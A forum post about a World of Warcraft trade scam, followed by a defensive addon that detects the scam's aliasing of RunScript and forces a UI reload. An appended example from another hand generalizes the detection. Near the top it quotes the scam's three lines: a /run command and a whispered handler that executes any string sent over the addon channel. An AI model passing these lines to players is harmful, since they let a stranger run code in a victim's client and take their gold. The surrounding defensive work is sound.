07-13-16, 11:38 PM   #1
Ketho
A Pyroguard Emberseer
Join Date: Mar 2010
Posts: 1,026
AcceptTrade gold scamming, catching hardware events

There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?

https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941

Run by the victim
Code:
/run RemoveExtraSpaces = RunScript
Whispered to victim
Code:
local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")
Addon channel
Code:
SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))

I tried thinking of a few possible countermeasures:
  • Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
    Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()
  • Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead

So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player

But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.

http://forums.wowace.com/showthread.php?t=20110


Lua Code:
local addonName = ...
local f = CreateFrame("Frame")
local db

local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
local msg_warn = msg..".\n\nClick anywhere to /reload."
local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."

StaticPopupDialogs.SAFETRADE_WARNING = {
    text = "%s",
    button1 = OKAY,
    exclusive = 1, whileDead = 1, showAlert = 1,
}

function f:OnEvent(event, addon)
    if addon == addonName then
        SafeTradeDB = SafeTradeDB or {}
        db = SafeTradeDB -- init savedvars
        -- a warning saved before the reload is shown once, then cleared
        if db.warning then
            StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
            db.warning = nil
        end
        self:SetHook("RunScript")

    elseif addon == "Blizzard_DebugTools" then
        self:SetHook("DevTools_DumpCommand")
    end
end

function f:SetHook(func)
    -- posthook: runs after every call to func
    hooksecurefunc(func, function()
        if _G[func] == RemoveExtraSpaces then
            -- reload asap, they can't be that fast ... right?
            db.warning = "RemoveExtraSpaces"
            StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
            self:CatchHW()
        end
    end)
end

local btn

function f:CatchHW()
    if not btn then
        -- full-screen secure button so the next click runs /reload
        btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
        btn:SetAllPoints(UIParent)
        btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
        btn:SetAttribute("macrotext", "/reload")
        --btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?

        btn:SetFrameStrata("TOOLTIP")
        btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
    end
end

f:RegisterEvent("ADDON_LOADED")
f:SetScript("OnEvent", f.OnEvent)

Last edited by Ketho : 07-14-16 at 05:31 PM.
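
Added example, not part of Ketho's post or addon: the hook above compares one known name (RemoveExtraSpaces) against RunScript; this sketch generalizes that check by scanning a global table for any name that holds the same function reference as a code-executing function named in the post. FindAliases, SENSITIVE and the env table are hypothetical names, and env is a constructed stand-in for _G so the block runs in plain Lua.

```lua
-- Functions that execute strings as code; names taken from the post.
local SENSITIVE = { "RunScript", "loadstring", "DevTools_DumpCommand" }

-- Returns a sorted list of { alias = name, target = sensitiveName } for every
-- entry in env that holds the same function object as a sensitive function
-- but is stored under a different name.
local function FindAliases(env)
    local byRef = {}
    for _, name in ipairs(SENSITIVE) do
        local fn = rawget(env, name)
        if type(fn) == "function" then byRef[fn] = name end
    end
    local hits = {}
    for name, value in pairs(env) do
        local target = type(value) == "function" and byRef[value]
        if target and name ~= target then
            hits[#hits + 1] = { alias = name, target = target }
        end
    end
    table.sort(hits, function(a, b) return a.alias < b.alias end)
    return hits
end

-- Constructed sample environment (assumption: stands in for _G).
local env = {
    RunScript = function(text) end,   -- placeholder for the client's RunScript
    loadstring = loadstring or load,  -- Lua 5.1 / 5.2+ compatibility
    print = print,
}
env.RemoveExtraSpaces = env.RunScript -- state after the victim's /run line
env.SomeHelper = env.loadstring       -- constructed: same check, other name

for _, hit in ipairs(FindAliases(env)) do
    print(("%s is an alias of %s"):format(hit.alias, hit.target))
end
```

Inside the client the same function would be called as FindAliases(_G) from the RunScript and DevTools_DumpCommand posthooks, with any hit treated like the RemoveExtraSpaces match in SetHook.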